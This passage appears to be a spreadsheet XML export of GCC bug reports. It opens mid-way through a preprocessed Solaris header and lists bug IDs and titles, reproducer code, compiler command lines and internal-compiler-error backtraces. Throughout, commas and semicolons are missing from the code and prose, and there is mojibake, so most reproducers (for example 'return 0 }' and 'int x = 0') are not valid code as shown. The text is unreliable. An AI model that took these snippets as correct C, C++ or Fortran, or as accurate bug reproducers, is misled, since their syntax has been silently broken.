# 1 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/sys/types.h 1 3
# 22 /usr/include/sys/stat.h 2 3
# 44 /usr/include/sys/stat.h 3
# 1 /usr/include/sys/time_std_impl.h 1 3
# 45 /usr/include/sys/stat.h 2 3
# 234 /usr/include/sys/stat.h 3
struct stat64 {
        dev_t st_dev
        long st_pad1[3]
        ino_t st_ino
        mode_t st_mode
        nlink_t st_nlink
        uid_t st_uid
        gid_t st_gid
        dev_t st_rdev
        long st_pad2[2]
        off_t st_size
# 254 /usr/include/sys/stat.h 3
        _timestruc_t st_atim
        _timestruc_t st_mtim
        _timestruc_t st_ctim
        blksize_t st_blksize
        blkcnt_t st_blocks
        char st_fstype[16]
        long st_pad4[8]
}
# 470 /usr/include/sys/stat.h 3
extern int fchmod(int mode_t)
extern int chmod(const char * mode_t)
extern int mkdir(const char * mode_t)
extern in</t>
  </si>
  <si>
    <t>fevrier</t>
  </si>
  <si>
    <t>GCC-59635</t>
  </si>
  <si>
    <t>[c++1y] ICE with auto and ... as lambda parameter</t>
  </si>
  <si>
    <t>The following valid code line (compiled with -std=c++1y) triggers an
ICE on trunk:
===========================================
auto i = [] (auto...) { return 0 }
===========================================
bug.cc:1:36: internal compiler error: tree check: expected function_decl have template_decl in maybe_add_lambda_conv_op at cp/lambda.c:973
 auto i = [] (auto...) { return 0 }
                                    ^
0xd8f084 tree_check_failed(tree_node const* char const* int char const* ...)
        ../../gcc/gcc/tree.c:9192
0x7736de tree_check
        ../../gcc/gcc/tree.h:2707
0x7736de maybe_add_lambda_conv_op(tree_node*)
        ../../gcc/gcc/cp/lambda.c:973
0x67cd8b cp_parser_lambda_expression
        ../../gcc/gcc/cp/parser.c:8763
0x67cd8b cp_parser_primary_expression
        ../../gcc/gcc/cp/parser.c:4309
0x67e5da cp_parser_postfix_expression
        ../../gcc/gcc/cp/parser.c:5969
0x681698 cp_parser_unary_expression
        ../../gcc/gcc/cp/parser.c:7170
0x68232f cp_parser_binary_expression
        ../../gcc/gcc/cp/parser.c:7874
0x682821 cp_parser_assignment_expression
        ../../gcc/gcc/cp/parser.c:8112
0x682ce5 cp_parser_assignment_expression
        ../../gcc/gcc/cp/parser.c:8162
0x682ce5 cp_parser_constant_expression
        ../../gcc/gcc/cp/parser.c:8372
0x693fc6 cp_parser_init_declarator
        ../../gcc/gcc/cp/parser.c:16761
0x69562f cp_parser_simple_declaration
        ../../gcc/gcc/cp/parser.c:11200
0x679003 cp_parser_block_declaration
        ../../gcc/gcc/cp/parser.c:11081
0x69fcd3 cp_parser_declaration
        ../../gcc/gcc/cp/parser.c:10978
0x69e9c8 cp_parser_declaration_seq_opt
        ../../gcc/gcc/cp/parser.c:10864
0x6a02ba cp_parser_translation_unit
        ../../gcc/gcc/cp/parser.c:4018
0x6a02ba c_parse_file()
        ../../gcc/gcc/cp/parser.c:31331
0x7c30f3 c_common_parse_file()
        ../../gcc/gcc/c-family/c-opts.c:1060
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-30191</t>
  </si>
  <si>
    <t>[4.3 Regression] GCC error: in eliminate_regs_in_insn at reload1.c:3126</t>
  </si>
  <si>
    <t>/test/gnu/gcc/objdir/./prev-gcc/xgcc -B/test/gnu/gcc/objdir/./prev-gcc/ -B/opt/g
nu/gcc/gcc-4.3.0/hppa2.0w-hp-hpux11.11/bin/ -c -g -O2 -mdisable-indexing     -gn
atpg -gnata -I- -I. -Iada -I../../gcc/gcc/ada ../../gcc/gcc/ada/nlists.adb -o ad
a/nlists.o
+===========================GNAT BUG DETECTED==============================+
| 4.3.0 20061212 (experimental) (hppa2.0w-hp-hpux11.11) GCC error:         |
| in eliminate_regs_in_insn at reload1.c:3126                             |
| Error detected at namet.adb:1375:1                                       |</t>
  </si>
  <si>
    <t>GCC-13405</t>
  </si>
  <si>
    <t>[tree-ssa] compiler fails to build mozilla</t>
  </si>
  <si>
    <t>GCC Version:
    GNU C++ version 3.5-tree-ssa 20031215 (merged 20031130)
Configure Flags:
    --prefix=... --srcdir=... --disable-multilib
Command Line and Compiler Output:
c++ -o nsRDFContentSink.o -c -DOSTYPE=\Linux2.4.21-4\ -DOSARCH=\Linux\ 
-I../../../dist/include/xpcom -I../../../dist/include/string
-I../../../dist/include/rdfutil -I../../../dist/include/necko
-I../../../dist/include/content -I../../../dist/include/htmlparser
-I../../../dist/include/unicharutil -I../../../dist/include/rdf
-I../../../dist/include
-I/to/scratch/bbooth/tree-ssa/build/i686/MOZILLA/dist/include/nspr        -fPIC
  -fno-rtti -fno-exceptions -Wall -Wconversion -Wpointer-arith -Wcast-align
-Woverloaded-virtual -Wsynth -Wno-ctor-dtor-privacy -Wno-long-long -pthread
-pipe  -DDEBUG -D_DEBUG -DDEBUG_bbooth -DTRACING -g -fno-inline  
-DMOZILLA_CLIENT -include ../../../mozilla-config.h
-Wp-MD.deps/nsRDFContentSink.pp
/notnfs/bbooth/tree-ssa/MOZILLA/mozilla/rdf/base/src/nsRDFContentSink.cpp
/notnfs/bbooth/tree-ssa/MOZILLA/mozilla/rdf/base/src/nsRDFContentSink.cpp: In
member function `nsresult RDFContentSinkImpl::InitContainer(nsIRDFResource*
nsIRDFResource*)':
/notnfs/bbooth/tree-ssa/MOZILLA/mozilla/rdf/base/src/nsRDFContentSink.cpp:1527:
internal compiler error: in record_call_1 at cgraphunit.c:286
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
=========================
.ii file to come...</t>
  </si>
  <si>
    <t>GCC-48457</t>
  </si>
  <si>
    <t>[C++0x] GCC does not recognize function rvalue reference expressions as lvalues</t>
  </si>
  <si>
    <t>GCC 4.7.0 rejects the following code in C++0x mode:
template
T
template
void test() {
 T t(create())
 (void) t
}
int main() {
   test&lt;void(
}
error: invalid initialization of non-const reference of type 'void
(&amp;)()' from an rvalue of type 'void()'
This code should be well-formed because the expression create() which is a function call expression returning an rvalue reference of function type is supposed to be an lvalue not an xvalue. According to (N3242) 3.10 [basic.lval] and confirmed by 5 [expr] p. 6 there are only xvalues of object type and the semantics of above initialization is described by 8.5.3 [dcl.init.ref] p. 5 bullet 1 sub-bullet 1 where an lvalue-reference binds to an lvalue (of function type).</t>
  </si>
  <si>
    <t>GCC-21639</t>
  </si>
  <si>
    <t>[4.1 Regression] poisoned ggc memory used for -ftree-vectorize</t>
  </si>
  <si>
    <t>The SPEC CPU2000 tests bzip2 gap and gcc cause mainline GCC to
segfault when built on powerpc64-linux with:
  -m32 -O2 -ftree-vectorize -maltivec -mabi=altivec \
  --param ggc-min-expand=0 --param ggc-min-heapsize=0
Every single CPU2000 test fails to build with those options and -m64
instead of -m32.  gap facerec and apsi sometimes fail with -m64
without the ggc params defined as mentioned in comment 4 of PR 21155.
This minimized test case demonstrates the bug:
extern void bar (unsigned char * int int)
unsigned char l[6][4]
int c[6][4]
void
foo (int n int a)
{
  int t i
  int x
  for (t = 0 t &lt; n t++)
    {
      for (i = 0 i &lt; a i++)
        x = l[t][i]
      bar (
    }
}
gdb shows the segfault at gcc/tree-chrec.c:1048 ct=0xa5a5a5a5.
The backtrace is too messy for cut-and-paste but shows
  chrec_convert
  interpret_rhs_modify_expr
  analyze_scalar_evolution_1
  analyze_scalar_evolution
  simple_iv
  number_of_iterations_exit
  number_of_iterations_in_loop
  canonicalize_loop_induction_variables
  tree_unroll_loops_completely
  tree_complete_unroll
  execute_pass_list
  ...
SPEC CPU2000 with the ggc params set to zero all build with -O2 and
with -O2 -ftree-loop-linear.
The failure shows up with this patch from radkver:
  http://gcc.gnu.org/ml/gcc-cvs/2005-05/msg00302.html
Just to make things even more interesting add -fprofile-generate
and the test case starts failing in the same place on 20050428 with
this patch from bonzini which suggests it's a latent bug unrelated
to these patches:
  http://gcc.gnu.org/ml/gcc-cvs/2005-04/msg01463.html</t>
  </si>
  <si>
    <t>GCC-14496</t>
  </si>
  <si>
    <t>[3.4 Regression] ICE at recog.c:2083 building libgcc2.c</t>
  </si>
  <si>
    <t>Current 3.4 branch from CVS.  Is a cutdown needed or is this happening with
mips-elf or another mips target?
../gcc-3.4-branch/configure --target=mips-rtems4.7 --enable-threads=rtems
--prefix=/opt/gcc-3.4-test --with-gnu-as --with-gnu-ld --with-newlib --verbose
--with-system-zlib --disable-nls --enable-version-specific-runtime-libs
--enable-languages=cc++
/usr3/ftp_archive/gnu/gcc/ss/b-3.4/b-mips-rtems4.7/gcc/xgcc
-B/usr3/ftp_archive/gnu/gcc/ss/b-3.4/b-mips-rtems4.7/gcc/ -nostdinc
-B/usr3/ftp_archive/gnu/gcc/ss/b-3.4/b-mips-rtems4.7/mips-rtems4.7/newlib/
-isystem
/usr3/ftp_archive/gnu/gcc/ss/b-3.4/b-mips-rtems4.7/mips-rtems4.7/newlib/targ-include
-isystem /usr3/ftp_archive/gnu/gcc/ss/b-3.4/gcc-3.4-branch/newlib/libc/include
-B/opt/gcc-3.4-test/mips-rtems4.7/bin/ -B/opt/gcc-3.4-test/mips-rtems4.7/lib/
-isystem /opt/gcc-3.4-test/mips-rtems4.7/include -isystem
/opt/gcc-3.4-test/mips-rtems4.7/sys-include -O2
-I../../gcc-3.4-branch/gcc/../newlib/libc/sys/rtems/include -DIN_GCC
-DCROSS_COMPILE   -W -Wall -Wwrite-strings -Wstrict-prototypes
-Wmissing-prototypes -Wold-style-definition  -isystem ./include  -G 0 -g
-DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED -Dinhibit_libc -I. -I
-I../../gcc-3.4-branch/gcc -I../../gcc-3.4-branch/gcc/
-I../../gcc-3.4-branch/gcc/../include   -msingle-float -DL_floatdidf -c
../../gcc-3.4-branch/gcc/libgcc2.c -o libgcc/single/_floatdidf.o
../../gcc-3.4-branch/gcc/libgcc2.c: In function `__floatdidf':
../../gcc-3.4-branch/gcc/libgcc2.c:1298: error: unrecognizable insn:
(insn 75 74 76 1 ../../gcc-3.4-branch/gcc/libgcc2.c:1295 (set (reg:DF 46 $f14)
        (unspec:DF [
                (reg:SI 5 $5 [orig:4+4 ] [4])
            ] 0)) -1 (nil)
    (nil))
../../gcc-3.4-branch/gcc/libgcc2.c:1298: internal compiler error: in
extract_insn at recog.c:2083</t>
  </si>
  <si>
    <t>GCC-68417</t>
  </si>
  <si>
    <t>[6 Regression] Missed vectorization opportunity when setting struct field</t>
  </si>
  <si>
    <t>Created attachment 36763
A reproducer
A loop in the test attached compiled with -m32 -msse4.2 -O2 -ftree-vectorize is no more vectorized after r230454(while on r223524.</t>
  </si>
  <si>
    <t>GCC-35113</t>
  </si>
  <si>
    <t>[4.3 Regression] g++.dg/ext/vector13.C doesn't work</t>
  </si>
  <si>
    <t>[hjl@gnu-27 g++]$ /export/build/gnu/gcc/build-x86_64-linux/gcc/testsuite/g++/../../g++ -B/export/build/gnu/gcc/build-x86_64-linux/gcc/testsuite/g++/../../ /net/gnu-13/export/gnu/src/gcc/gcc/gcc/testsuite/g++.dg/ext/vector13.C  -nostdinc++ -I/export/build/gnu/gcc/build-x86_64-linux/x86_64-unknown-linux-gnu/libstdc++-v3/include/x86_64-unknown-linux-gnu -I/export/build/gnu/gcc/build-x86_64-linux/x86_64-unknown-linux-gnu/libstdc++-v3/include -I/net/gnu-13/export/gnu/src/gcc/gcc/libstdc++-v3/libsupc++ -I/net/gnu-13/export/gnu/src/gcc/gcc/libstdc++-v3/include/backward -I/net/gnu-13/export/gnu/src/gcc/gcc/libstdc++-v3/testsuite/util -fmessage-length=0   -ansi -pedantic-errors -Wno-long-long  -fno-show-column -S  -o vector13.s  
/net/gnu-13/export/gnu/src/gcc/gcc/gcc/testsuite/g++.dg/ext/vector13.C:6: error: zero-size array â€˜xâ€™
[hjl@gnu-27 g++]$</t>
  </si>
  <si>
    <t>GCC-37828</t>
  </si>
  <si>
    <t>[graphite] ICE in expand_scalar_variables_expr at graphite.c:3421 with -floop-block</t>
  </si>
  <si>
    <t>g++ -c -floop-block -O3 bug_rep.cpp 
bug_rep.cpp: In function â€˜int sort_and_split(foo** foo**&amp; long int)â€™:
bug_rep.cpp:9: internal compiler error: in expand_scalar_variables_expr at graphite.c:3421
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Testcase attached.
- Dwarak</t>
  </si>
  <si>
    <t>dwarak.rajagopal</t>
  </si>
  <si>
    <t>GCC-63455</t>
  </si>
  <si>
    <t>[4.8/4.9/5 Regression] decltype of statement expression  internal compiler error: in cp_parser_abort_tentative_parse at cp/parser.c:25062</t>
  </si>
  <si>
    <t>good: Debian 4.6.4-7
bad: Debian 4.7.4-3
bad: Debian 4.8.3-11
bad: Debian 4.9.1-15
int main()
{
    int x = 0
    // without '+0' gcc 4.6 gives a different error (no ICE though)
    decltype(({ int y = x y })+0) v1 = 0
}</t>
  </si>
  <si>
    <t>GCC-50866</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE in verify_gimple_stmt at tree-cfg.c:4175</t>
  </si>
  <si>
    <t>Consider:
 % &lt; test.cpp
#include 
struct KeyParams {
     std::string hostname
     std::string username
}
class SyncInternal
{
void SetPassphrase()
}
void SyncInternal::SetPassphrase()
{
     KeyParams params = {
          ab
     }
}
 % g++ -w -fpermissive test.cpp
test.cpp: In member function â€˜void SyncInternal::SetPassphrase()â€™:
test.cpp:10:6: internal compiler error: in verify_gimple_stmt at
tree-cfg.c:4175
Please submit a full bug report
bit-bisect points to:
b3c93f85c7135781bfe1a520feab3fbe440338e6 is the first bad commit
commit b3c93f85c7135781bfe1a520feab3fbe440338e6
Author: jason 
Date:   Thu Oct 20 19:13:51 2011 +0000
        PR c++/41449
        * typeck2.c (split_nonconstant_init_1): Handle EH cleanup of
        initialized subobjects.
    git-svn-id: svn+ssh://gcc.gnu.org/svn/gcc/trunk@180267
138bc75d-0d04-0410-961f-82ee72b054a4</t>
  </si>
  <si>
    <t>GCC-36974</t>
  </si>
  <si>
    <t>Gcc 4.4 revision 138310 failed to bootstrap on Linux/ia64:
./../../src/libgcc/../gcc/libgcc2.c: In function '__addvsi3':
../../../src/libgcc/../gcc/libgcc2.c:104: internal compiler error: in call_from_call_insn at final.c:1760
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[5]: *** [_addvsi3.o] Error 1
I think it is introduced by revision 138310:
http://gcc.gnu.org/ml/gcc-cvs/2008-07/msg01023.html
Revision 138296 is OK.</t>
  </si>
  <si>
    <t>GCC-77959</t>
  </si>
  <si>
    <t>[6 Regression] ICE in ix86_decompose_address at i386/i386.c:14954</t>
  </si>
  <si>
    <t>Invalid code with ICE down to at least 4.8 at -Os -O1 or higher.
No ICE with version 5.4.1.
$ cat z1.f90
program p
   interface
      subroutine s(x)
         real :: x
      end
   end interface
   call s(1.0)
end
subroutine s(x)
   complex :: x
   x = x + 1
end
$ gfortran-7-20161009 -O2 z1.f90
z1.f90:3:18:
       subroutine s(x)
                  1
Warning: Interface mismatch in global procedure 's' at (1): Type mismatch in argument 'x' (REAL(4)/COMPLEX(4))
z1.f90:11:0:
    x = x + 1
internal compiler error: Segmentation fault
0xc2a7cf crash_signal
        ../../gcc/toplev.c:337
0xf69ea4 ix86_decompose_address(rtx_def* ix86_address*)
        ../../gcc/config/i386/i386.c:14954
0xf6bd9b ix86_legitimate_address_p
        ../../gcc/config/i386/i386.c:15668
0xb8b07e memory_address_addr_space_p(machine_mode rtx_def* unsigned char)
        ../../gcc/recog.c:1336
0x8df897 adjust_address_1(rtx_def* machine_mode long int int int long)
        ../../gcc/emit-rtl.c:2221
0x91e9b1 store_field
        ../../gcc/expr.c:6938
0x91a7b7 expand_assignment(tree_node* tree_node* bool)
        ../../gcc/expr.c:5167
0x8083e6 expand_gimple_stmt_1
        ../../gcc/cfgexpand.c:3649
0x8083e6 expand_gimple_stmt
        ../../gcc/cfgexpand.c:3745
0x80a80e expand_gimple_basic_block
        ../../gcc/cfgexpand.c:5752
0x810996 execute
        ../../gcc/cfgexpand.c:6363</t>
  </si>
  <si>
    <t>GCC-68221</t>
  </si>
  <si>
    <t>libgomp reduction-11/12 failures</t>
  </si>
  <si>
    <t>Without the XFAILs I've added I'm getting:
FAIL: libgomp.c/reduction-11.c execution test
FAIL: libgomp.c/reduction-12.c execution test
FAIL: libgomp.c++/reduction-11.C execution test
FAIL: libgomp.c++/reduction-12.C execution test
on i686-linux (32-bit only 64-bit x86_64-linux works) when the testcases are compiled with -fopenmp -O2.  At -O0 they work.
These testcases test array reductions with non-zero low-bound where for stack space reasons the compiler is creating private variable just for the array section and not elements before or after it in the original array.
E.g. for reduction (b[2:3]) the user is allowed to touch in the region
b[2] b[3] b[4] but not b[0] b[1] or b[5].  The current implementation
allocates short int b.23[3] automatic variable in this case and needs to replace the original b with &amp;b.23 - 2 so that b + 2 then is in range.  If the low-bound is not constant (or if it is zero) all is fine but when it is constant we after IL simplifications end up with
MEM[(short int *)&amp;b.23 + 4294967292B][2]
but apparently on i686-linux -m32 -O2 -fopenmp on reduction-11.c at least
PRE seems to think that stores to
MEM[(short int *)&amp;b.23 + 4294967292B][2]
can't alias reads from it.
On the OpenMP side I guess I could try casting  p =  asm ( : +g (p))
but then points-to analysis will pessimize code.  If we could get
the above folded into MEM[(short int *)&amp;b.23][0] it would be nice but can we really rely on that being always done?</t>
  </si>
  <si>
    <t>GCC-9264</t>
  </si>
  <si>
    <t>[3.4 regression] [parser] ICE on invalid octal constant</t>
  </si>
  <si>
    <t>Compiling (g++ -c) the following illegal line of code
--------------snip here----------------
int i = 08
--------------snip here----------------
I get an ICE:
bug.cc:1:9: invalid digit 8 in octal constant
bug.cc:1: internal compiler error: Segmentation fault
Please submit a full bug report [etc.]
With the C front-end I get no ICE.
Release:
gcc 3.4-20030106
Environment:
i686-pc-linux-gnu
How-To-Repeat:
g++ -c</t>
  </si>
  <si>
    <t>GCC-2581</t>
  </si>
  <si>
    <t>Internal error: Segmentation fault. g++ compiler message</t>
  </si>
  <si>
    <t>A do-while loop that has the following error with the  
do{
}
while(x&gt;0)
produces the segmentation fault error and please generate 
a bug report message.
Release:
unknown
How-To-Repeat:
compile the program</t>
  </si>
  <si>
    <t>dee</t>
  </si>
  <si>
    <t>GCC-65064</t>
  </si>
  <si>
    <t>[5 regression] FAIL: gcc.dg/torture/pr60115.c   -O1  (test for excess errors)</t>
  </si>
  <si>
    <t>$ gcc/xgcc -B gcc/ ../gcc/testsuite/gcc.dg/torture/pr60115.c -O
/usr/ia64-suse-linux/bin/ld: a.out: __gp does not cover short data segment
collect2: error: ld returned 1 exit status
Broken by r220674.
--- gcc-20150213/Build/pr60115.s        2015-02-14 21:36:37.000000000 +0100
+++ gcc-20150214/Build/pr60115.s        2015-02-14 21:35:30.000000000 +0100
@@ -722 +720 @@
        .proc main#
 main:
        .prologue
-       .save ar.lc r3
-       mov r3 = ar.lc
+       .save ar.lc r2
+       mov r2 = ar.lc
        .body
 [.L2:]
-       addl r14 = @ltoffx(a#) r1
-       
-       ld8.mov r14 = [r14] a#
+       addl r14 = @gprel(a#) gp
        ld4 r14 = [r14]
        cmp4.eq p6 p7 = 0 r14
-       addl r2 = @ltoffx(b#) r1
+       addl r16 = @ltoffx(b#+32768) r1
-       ld8.mov r2 = [r2] b#
+       ld8.mov r16 = [r16] b#+32768
-       addl r16 = 40000 r2
+       adds r16 = 7232 r16
 .L4:
        .pred.rel.mutex p6 p7
        (p6) br.cond.dpnt .L3
@@ -4017 +3815 @@
        adds r14 = -1 r14
        br.cloop.sptk.few .L6
-       addl r14 = @ltoffx(a#) r1
-       
-       ld8.mov r14 = [r14] a#
+       addl r14 = @gprel(a#) gp
        st4 [r14] = r0
 .L3:
        mov r8 = r0
-       mov ar.lc = r3
+       mov ar.lc = r2
        br.ret.sptk.many b0
        .endp main#
        .common b#84
        .common a#44
-       .ident  GCC: (GNU) 5.0.0 20150213 (experimental) [trunk revision 220673]
+       .ident  GCC: (GNU) 5.0.0 20150214 (experimental) [trunk revision 220705]</t>
  </si>
  <si>
    <t>GCC-17778</t>
  </si>
  <si>
    <t>[3.4/4.0 Regression] regression in evaluating long double hexadecimal constants</t>
  </si>
  <si>
    <t>On FreeBSD/i386 FPU precision is set to 53 bits to avoid problems with extra
precision and double rounding for doubles.  gcc understands this and evaluates
FP constants in 53-bit precision even for long doubles.  (See
ieee_extended_intel_96_round_53_format in real.c.)  However gcc occasionally
evaluates hexadecimal (and possibly decimal) floating-point constants
incorrectly starting with version 3.4:
        das@VARK:~&gt; cat bar.c
        #include 
        int main(int argc char *argv[]) {
            volatile long double d = 0x3.243f6a8885a31p0L
            printf(%La\n d)
            d = 2.0 * d / 2.0
            printf(%La\n d)
            return (0)
        }
        das@VARK:~&gt; gcc33 bar.c
        das@VARK:~&gt; ./a.out
        0xc.90fdaa22168cp-2
        0xc.90fdaa22168cp-2
        das@VARK:~&gt; gcc bar.c
        das@VARK:~&gt; ./a.out
        0xc.90fdaa22168c4p-2
        0xc.90fdaa22168cp-2
        das@VARK:~&gt; gcc --version
        gcc (GCC) 3.4.2 [FreeBSD] 20040728
        das@VARK:~&gt; gcc33 --version
        gcc33 (GCC) 3.3.5 20040630 (prerelease) [FreeBSD]
In the tests I've tried the symptoms were always setting the 57th mantissa bit
even when the number would not have that bit set when rounded to 57 bits.  Given
the position of the incorrect bit I suspect that the bug is due to either a
mistake in the way rounding is handled or more likely an endianness mistake
in the handling of the sign bit that doesn't show up in the 96-bit format since
the 97th bit is ignored.</t>
  </si>
  <si>
    <t>das</t>
  </si>
  <si>
    <t>GCC-79380</t>
  </si>
  <si>
    <t>ICE on C++11 code with illegal alignas specifier on x86_64-linux-gnu: unexpected expression â€˜fâ€™ of kind overload</t>
  </si>
  <si>
    <t>It seems to affect all versions 4.8.x and later. 
$ g++-trunk -v
Using built-in specs.
COLLECT_GCC=g++-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/7.0.1/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 7.0.1 20170204 (experimental) [trunk revision 245182] (GCC)
$
$ g++-trunk -std=c++11 -c small.cpp
small.cpp:4:17: internal compiler error: unexpected expression â€˜fâ€™ of kind overload
 struct alignas (f) S {}
                 ^
0x8d4f9e cxx_eval_constant_expression
        ../../gcc-source-trunk/gcc/cp/constexpr.c:4533
0x8da649 cxx_eval_outermost_constant_expr
        ../../gcc-source-trunk/gcc/cp/constexpr.c:4591
0x7c05bb cp_parser_std_attribute_spec
        ../../gcc-source-trunk/gcc/cp/parser.c:24962
0x7c05bb cp_parser_std_attribute_spec_seq
        ../../gcc-source-trunk/gcc/cp/parser.c:25002
0x7aa6f5 cp_parser_class_head
        ../../gcc-source-trunk/gcc/cp/parser.c:22414
0x7aa6f5 cp_parser_class_specifier_1
        ../../gcc-source-trunk/gcc/cp/parser.c:22032
0x7ac3d9 cp_parser_class_specifier
        ../../gcc-source-trunk/gcc/cp/parser.c:22344
0x7ac3d9 cp_parser_type_specifier
        ../../gcc-source-trunk/gcc/cp/parser.c:16408
0x7c40f3 cp_parser_decl_specifier_seq
        ../../gcc-source-trunk/gcc/cp/parser.c:13325
0x7ce2a0 cp_parser_simple_declaration
        ../../gcc-source-trunk/gcc/cp/parser.c:12649
0x7cf161 cp_parser_block_declaration
        ../../gcc-source-trunk/gcc/cp/parser.c:12594
0x7d5f30 cp_parser_declaration
        ../../gcc-source-trunk/gcc/cp/parser.c:12491
0x7d6334 cp_parser_declaration_seq_opt
        ../../gcc-source-trunk/gcc/cp/parser.c:12367
0x7d6678 cp_parser_translation_unit
        ../../gcc-source-trunk/gcc/cp/parser.c:4366
0x7d6678 c_parse_file()
        ../../gcc-source-trunk/gcc/cp/parser.c:38382
0x93e552 c_common_parse_file()
        ../../gcc-source-trunk/gcc/c-family/c-opts.c:1107
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$
------------------------------------------------------------
template  constexpr int f () {  return 8  }
// should have been: struct alignas (f()) S {}
struct alignas (f) S {}</t>
  </si>
  <si>
    <t>GCC-32429</t>
  </si>
  <si>
    <t>[PPC missing optimization] stack space not optimized when stack not used</t>
  </si>
  <si>
    <t>A variety of options prepare some additional space on the stack. It isn't optimized when stack isn't used. Those options are:
version  options
 3.3     -fpic -fPIC -mabi=altivec
 4.1.2   -fpic -fPIC -fpie -fPIE -maltivec
 4.2.0   -fpic -fPIC -fpie -fPIE -maltivec
4.3-pre  -fpic -fPIC -fpie -fPIE
problem with -maltivec has been partially fixed in 4.3 (see bug 32401)
$ gcc-3.3 --version
gcc-3.3 (GCC) 3.3.6 (Debian 1:3.3.6-15)
$ gcc-3.3 -S -O2 empty.c &amp;&amp; grep -A3 empty: empty.s
empty:
	blr
	.size	empty .-empty
	.section	.note.GNU-stack@progbits
$ gcc-3.3 -S -O2 -fpic empty.c &amp;&amp; grep -A3 empty: empty.s
empty:
	stwu 1-32(1)
	addi 1132
	blr
$ gcc-3.3 -S -O2 -fPIC empty.c &amp;&amp; grep -A3 empty: empty.s
empty:
	stwu 1-32(1)
	addi 1132
	blr
$ gcc-3.3 -S -O2 -maltivec empty.c &amp;&amp; grep -A3 empty: empty.s
empty:
	blr
	.size	empty .-empty
	.section	.note.GNU-stack@progbits
$ gcc-3.3 -S -O2 -maltivec -mabi=altivec empty.c &amp;&amp; grep -A3 empty: empty.s
empty:
	stwu 1-16(1)
	addi 1116
	blr
$ gcc-3.3 -S -O2 -fpic -maltivec -mabi=altivec empty.c &amp;&amp; grep -A3 empty: empty.s
empty:
	stwu 1-32(1)
	addi 1132
	blr
$ gcc-3.3 -S -O2 -fPIC -maltivec -mabi=altivec empty.c &amp;&amp; grep -A3 empty: empty.s
empty:
	stwu 1-32(1)
	addi 1132
	blr
$ gcc --version
gcc (GCC) 4.1.2 (PLD-Linux)
$ gcc -S -O2 empty.c &amp;&amp; grep -A3 empty: empty.s 
empty:
	blr
	.size	empty .-empty
	.ident	GCC: (GNU) 4.1.2 (PLD-Linux)
$ gcc -S -O2 -fpic empty.c &amp;&amp; grep -A3 empty: empty.s 
empty:
	stwu 1-16(1)
	addi 1116
	blr
$ gcc -S -O2 -fPIC empty.c &amp;&amp; grep -A3 empty: empty.s 
empty:
	stwu 1-16(1)
	addi 1116
	blr
$ gcc -S -O2 -fpie empty.c &amp;&amp; grep -A3 empty: empty.s 
empty:
	stwu 1-16(1)
	addi 1116
	blr
$ gcc -S -O2 -fPIE empty.c &amp;&amp; grep -A3 empty: empty.s 
empty:
	stwu 1-16(1)
	addi 1116
	blr
$ gcc -S -O2 -maltivec empty.c &amp;&amp; grep -A3 empty: empty.s 
empty:
	stwu 1-16(1)
	addi 1116
	blr
$ gcc -S -O2 -maltivec -mabi=altivec empty.c &amp;&amp; grep -A3 empty: empty.s 
empty:
	stwu 1-16(1)
	addi 1116
	blr
$ gcc -S -O2 -fpic -maltivec -mabi=altivec empty.c &amp;&amp; grep -A3 empty: empty.s 
empty:
	stwu 1-32(1)
	addi 1132
	blr
$ gcc -S -O2 -fpie -maltivec -mabi=altivec empty.c &amp;&amp; grep -A3 empty: empty.s 
empty:
	stwu 1-32(1)
	addi 1132
	blr
$ gcc-4.3 --version
gcc-4.3 (GCC) 4.3.0 20070615 (experimental)
$ gcc-4.3 -S -O2 empty.c &amp;&amp; grep -A3 empty: empty.s 
empty:
	blr
	.size	empty .-empty
	.ident	GCC: (GNU) 4.3.0 20070615 (experimental)
$ gcc-4.3 -S -O2 -fpic empty.c &amp;&amp; grep -A3 empty: empty.s 
empty:
	stwu 1-16(1)
	addi 1116
	blr
$ gcc-4.3 -S -O2 -fPIC empty.c &amp;&amp; grep -A3 empty: empty.s 
empty:
	stwu 1-16(1)
	addi 1116
	blr
$ gcc-4.3 -S -O2 -fpie empty.c &amp;&amp; grep -A3 empty: empty.s 
empty:
	stwu 1-16(1)
	addi 1116
	blr
$ gcc-4.3 -S -O2 -fPIE empty.c &amp;&amp; grep -A3 empty: empty.s 
empty:
	stwu 1-16(1)
	addi 1116
	blr
$ gcc-4.3 -S -O2 -maltivec empty.c &amp;&amp; grep -A3 empty: empty.s 
empty:
	blr
	.size	empty .-empty
	.ident	GCC: (GNU) 4.3.0 20070615 (experimental)
$ gcc-4.3 -S -O2 -maltivec -mabi=altivec empty.c &amp;&amp; grep -A3 empty: empty.s 
empty:
	blr
	.size	empty .-empty
	.ident	GCC: (GNU) 4.3.0 20070615 (experimental)
$ gcc-4.3 -S -O2 -fpic -maltivec -mabi=altivec empty.c &amp;&amp; grep -A3 empty: empty.s 
empty:
	stwu 1-32(1)
	addi 1132
	blr
$ gcc-4.3 -S -O2 -fPIC -maltivec -mabi=altivec empty.c &amp;&amp; grep -A3 empty: empty.s 
empty:
	stwu 1-32(1)
	addi 1132
	blr
$ gcc-4.3 -S -O2 -fpie -maltivec -mabi=altivec empty.c &amp;&amp; grep -A3 empty: empty.s 
empty:
	stwu 1-32(1)
	addi 1132
	blr
$ gcc-4.3 -S -O2 -fPIE -maltivec -mabi=altivec empty.c &amp;&amp; grep -A3 empty: empty.s 
empty:
	stwu 1-32(1)
	addi 1132
	blr</t>
  </si>
  <si>
    <t>sparky</t>
  </si>
  <si>
    <t>GCC-56252</t>
  </si>
  <si>
    <t>Out-of-bounds array access in vectorized loop</t>
  </si>
  <si>
    <t>Created attachment 29395
Minimized source code exhibiting the issue
The attached minimized source generates invalid code when compiled with -O3 on gcc-4.4 (including gcc 4.4.7) by accessing outside of an array that is besing processed in the foo call.
This can be seen by running that sample code in valgrind:
$ gcc-4.4 -v
Using built-in specs.
